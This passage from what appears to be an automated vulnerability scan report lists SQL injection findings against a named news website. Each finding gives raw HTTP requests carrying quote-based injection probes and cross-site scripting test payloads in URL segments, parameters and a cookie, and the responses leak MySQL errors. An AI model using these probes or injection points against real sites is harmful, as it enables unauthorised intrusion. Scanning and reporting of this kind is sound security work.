Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues''/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.104. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m8vgi6a1mfd687lf7jouu8s291; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3' at line 1</font>
...[SNIP]...

1.105. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan''?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.106. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=a5subqjcjob8idi2bff81gl8t2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND' at line 1</font>
...[SNIP]...

1.107. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [count cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The count cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the count cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=1hojl696rbnphcmga5ld1cf013; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND cookie' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.108. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.109. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m6r6k5h7dhvssd9n0b3p4vupn1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1' AND c' at line 1</font>
...[SNIP]...

1.110. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page=' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?t' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page='' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.111. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [print parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The print parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the print parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1'&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1''&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.112. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [tmpl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component'&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component''&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

